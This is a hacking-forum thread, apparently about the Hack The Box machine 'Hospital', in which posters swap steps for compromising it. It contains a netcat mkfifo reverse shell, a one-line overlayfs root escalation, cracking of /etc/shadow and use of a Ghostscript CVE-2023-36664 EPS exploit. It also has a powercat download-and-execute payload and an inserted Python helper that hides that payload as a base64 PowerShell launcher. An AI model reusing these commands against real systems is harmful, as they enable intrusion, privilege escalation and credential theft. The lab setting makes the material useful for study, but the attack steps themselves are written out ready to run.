HTB - Hospital
by take1312 - Saturday November 18, 2023 at 06:51 PM
#31
Okay, here is a short summary of what to do:

upload:
https://github.com/flozz/p0wny-shell
access via web /uploads/filename
get shell as www-data in browser
get to netcat shell with rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc yourip 443 >/tmp/f
get root shell with
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("bash -i")'

check here:
https://www.reddit.com/r/selfhosted/comm...e20232640/

get /etc/shadow and crack drwilliams' password

use drwilliams password to login on https (the mail application)
with drwilliams@hospital.htb
and his password

read the mail in the inbox

use this exploit https://github.com/jakabakos/CVE-2023-36...-injection

to craft a malicious .eps file
send it as a reply to the mail
-> you get a user shell on hospital
get user flag

root can you find out yourself easily
Reply
#32
(Nov 19, 2023, 12:45 AM)take1312 Wrote: (quoting the summary in #31)

not really helpful for me :(
Reply
#33
(Nov 19, 2023, 12:47 AM)blade33 Wrote:
(Nov 19, 2023, 12:45 AM)take1312 Wrote: (quoting the summary in #31)

not really helpful for me :(
what user on what machine are you? just answer my question and I'll help..
Reply
#34
(Nov 19, 2023, 12:47 AM)blade33 Wrote:
(Nov 19, 2023, 12:45 AM)take1312 Wrote: (quoting the summary in #31)

not really helpful for me :(

did you look in the dir you landed in?
Reply
#35
(Nov 19, 2023, 12:52 AM)take1312 Wrote:
(Nov 19, 2023, 12:47 AM)blade33 Wrote:
(Nov 19, 2023, 12:45 AM)take1312 Wrote: (quoting the summary in #31)

not really helpful for me :(
what user on what machine are you? just answer my question and I'll help..


I did. hospital\drbrown on Windows.
Reply
#36
(Nov 19, 2023, 12:54 AM)blade33 Wrote:
(Nov 19, 2023, 12:52 AM)take1312 Wrote:
(Nov 19, 2023, 12:47 AM)blade33 Wrote:
(Nov 19, 2023, 12:45 AM)take1312 Wrote: (quoting the summary in #31)

not really helpful for me :(
what user on what machine are you? just answer my question and I'll help..


I did. hospital\drbrown on Windows.

check your pm
Reply
#37
(Nov 18, 2023, 09:33 PM)VfV Wrote: Guys? I can't access the mysql, even with the credentials, it says access denied while I'm trying
mysql -u root -password my$qls3rv1c3! -D hospital

Also, how did you get from that webshell to a revshell?
I can't go full TTY with the ctrl+Z thing if it's in the web

you should escape the $ as \$
Reply
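The reason the `$` matters, as an added example that is not part of the thread: in an unquoted argument a POSIX shell treats `$qls3rv1c3` as a variable reference, so the mysql client never sees the real password. The script below runs the same string through `/bin/sh` unquoted and quoted with `shlex.quote`, then builds the mysql argv so the password bypasses the shell entirely. The password string is the one VfV posted; the `printf` probe, the argv layout and the `MYSQL_PWD` variant are mine. One more caveat from the client itself: `-p` only takes a password when the value is glued on (`-p'my$qls3rv1c3!'`); with a space after it, mysql prompts and treats the next word as the database name.

```python
"""Why 'my$qls3rv1c3!' breaks as an unquoted shell argument, and how to hand it
to the mysql client safely.  Added example for this thread."""
import os
import shlex
import subprocess

PASSWORD = "my$qls3rv1c3!"   # the password string posted in the thread


def shell_sees(arg: str) -> str:
    """Run `printf %s <arg>` through /bin/sh and return what the shell actually
    passed on. Unquoted, `$qls3rv1c3` is expanded as an (unset) variable and
    only "my!" survives."""
    out = subprocess.run(["sh", "-c", f"printf %s {arg}"],
                         capture_output=True, text=True, check=True)
    return out.stdout


def shell_sees_quoted(arg: str) -> str:
    """Same probe, but with the argument single-quoted via shlex.quote, which
    is the programmatic form of typing 'my$qls3rv1c3!' (or my\$qls3rv1c3!)."""
    return shell_sees(shlex.quote(arg))


def mysql_argv(user: str, password: str, db: str) -> list[str]:
    """argv for the mysql client with the password attached to -p.
    Passed as a list to subprocess, it never goes through a shell, so no
    quoting or escaping is needed at all."""
    return ["mysql", "-u", user, f"-p{password}", "-D", db]


def mysql_env(user: str, password: str, db: str) -> tuple[list[str], dict]:
    """Alternative: supply the password in MYSQL_PWD so it does not show up in
    the process list (ps / /proc/<pid>/cmdline). Returns (argv, env)."""
    env = dict(os.environ, MYSQL_PWD=password)
    return ["mysql", "-u", user, "-D", db], env


if __name__ == "__main__":
    print("unquoted :", shell_sees(PASSWORD))           # my!
    print("quoted   :", shell_sees_quoted(PASSWORD))    # my$qls3rv1c3!
    argv = mysql_argv("root", PASSWORD, "hospital")
    print("argv     :", argv)
    # What you would type interactively: every element shell-quoted.
    print("cmdline  :", " ".join(shlex.quote(a) for a in argv))
```

Typed by hand, the equivalent is `mysql -u root -p'my$qls3rv1c3!' -D hospital`; the `MYSQL_PWD` route is the one to prefer on a shared box, since anything on the command line is readable by every other user.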
#38
(Nov 19, 2023, 01:25 AM)Miranda0315 Wrote:
(Nov 19, 2023, 12:45 AM)take1312 Wrote: (quoting the summary in #31)

That's awesome!!
I used the CVE and created an .eps file.
python3 exploit.py --generate --revshell -ip 10.10.14.8 -port 4444 --filename good --extension eps
Then, reply to the email. But did not get the reverse shell. Did I do anything wrong??

yes, you are doing something wrong
when using --revshell it uses this, which is for Linux, while you are trying to get a rev shell on Windows:

def generate_rev_shell_payload(ip, port):
    # bash /dev/tcp reverse shell: only works where /bin/sh exists, not on a Windows target
    payload = f"UNIX_REV_SHELL_PAYLOAD=f\"0<&196;exec 196<>/dev/tcp/{ip}/{port}; sh <&196 >&196 2>&196\""
    return payload
Reply
#39
(Nov 19, 2023, 01:29 AM)Miranda0315 Wrote:
(Nov 19, 2023, 01:25 AM)Miranda0315 Wrote:
(Nov 19, 2023, 12:45 AM)take1312 Wrote: (quoting the summary in #31)

That's awesome!!
I used the CVE and created an .eps file.
python3 exploit.py --generate --revshell -ip 10.10.14.8 -port 4444 --filename good --extension eps
Then, reply to the email. But did not get the reverse shell. Did I do anything wrong??
I know the reason now LOL
Thank you

python3 CVE_2023_36664_exploit.py --inject --payload " payloadhere" --filename file.eps

I used PowerShell base64
Reply
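What "PowerShell base64" means in practice, as an added example that is not code from the thread or from the CVE-2023-36664 exploit repo: `powershell -e` (`-EncodedCommand`) expects base64 over the UTF-16LE bytes of the script, not over its ASCII text, so `echo ... | base64` produces garbage on the target. The helper below encodes a command that way, decodes it back for checking, and assembles the `--inject --payload ... --filename file.eps` invocation exactly as posted above. The powercat download line and the 10.10.14.8:4444 listener are the ones Miranda0315 posted; the `-nop -w hidden` switches and the argv layout are my choices. The useful property of the encoded form is that the base64 alphabet contains no quotes, `$`, `(`, `)` or `\`, so the launcher survives both the shell command line and being embedded in a PostScript string.

```python
"""Build a PowerShell -EncodedCommand launcher for the --inject step.
Added example for this thread, not part of the exploit repo."""
import base64
import shlex

# Download-and-run powercat as posted in the thread (attacker IP/port are the poster's).
POWERCAT_CMD = ("IEX(New-Object System.Net.WebClient)"
                ".DownloadString('http://10.10.14.8/powercat.ps1');"
                "powercat -c 10.10.14.8 -p 4444 -e cmd")

# Characters that would break a PostScript string or a shell command line.
UNSAFE = set("'\"$()\\")


def encode_command(ps: str) -> str:
    """powershell -e wants base64 of the UTF-16LE encoding of the script."""
    return base64.b64encode(ps.encode("utf-16-le")).decode("ascii")


def decode_command(b64: str) -> str:
    """Inverse, for checking a payload before it goes into the EPS file."""
    return base64.b64decode(b64).decode("utf-16-le")


def powershell_launcher(ps: str) -> str:
    """One-line launcher: no profile, hidden window, encoded script.
    Nothing in it needs quoting, whatever the original script contained."""
    launcher = f"powershell -nop -w hidden -e {encode_command(ps)}"
    assert not (set(launcher) & UNSAFE), "launcher contains a delimiter character"
    return launcher


def exploit_argv(ps: str, filename: str = "file.eps") -> list[str]:
    """argv for the inject invocation used in the thread (flags as posted)."""
    return ["python3", "CVE_2023_36664_exploit.py", "--inject",
            "--payload", powershell_launcher(ps), "--filename", filename]


if __name__ == "__main__":
    print(encode_command("whoami"))        # dwBoAG8AYQBtAGkA
    print(powershell_launcher(POWERCAT_CMD))
    print(" ".join(shlex.quote(a) for a in exploit_argv(POWERCAT_CMD)))
```

The quick sanity check before sending the mail is `decode_command(...)` on the blob you embedded: if it does not round-trip to the exact PowerShell you meant, the problem is the encoding, not the listener.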
#40
(Nov 19, 2023, 01:39 AM)Miranda0315 Wrote:
(Nov 19, 2023, 01:27 AM)take1312 Wrote:
(Nov 19, 2023, 01:25 AM)Miranda0315 Wrote:
(Nov 19, 2023, 12:45 AM)take1312 Wrote: (quoting the summary in #31)

That's awesome!!
I used the CVE and created an .eps file.
python3 exploit.py --generate --revshell -ip 10.10.14.8 -port 4444 --filename good --extension eps
Then, reply to the email. But did not get the reverse shell. Did I do anything wrong??

yes, you are doing something wrong
when using --revshell it uses this, which is for Linux, while you are trying to get a rev shell on Windows:

def generate_rev_shell_payload(ip, port):
    payload = f"UNIX_REV_SHELL_PAYLOAD=f\"0<&196;exec 196<>/dev/tcp/{ip}/{port}; sh <&196 >&196 2>&196\""
    return payload
I changed it to this now
 python3 exploit.py --generate --payload 'powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.14.8/powercat.ps1');powercat -c 10.10.14.8 -p 4444 -e cmd"' --filename file --extension eps
still doesn't work

just read my last post maybe?
Reply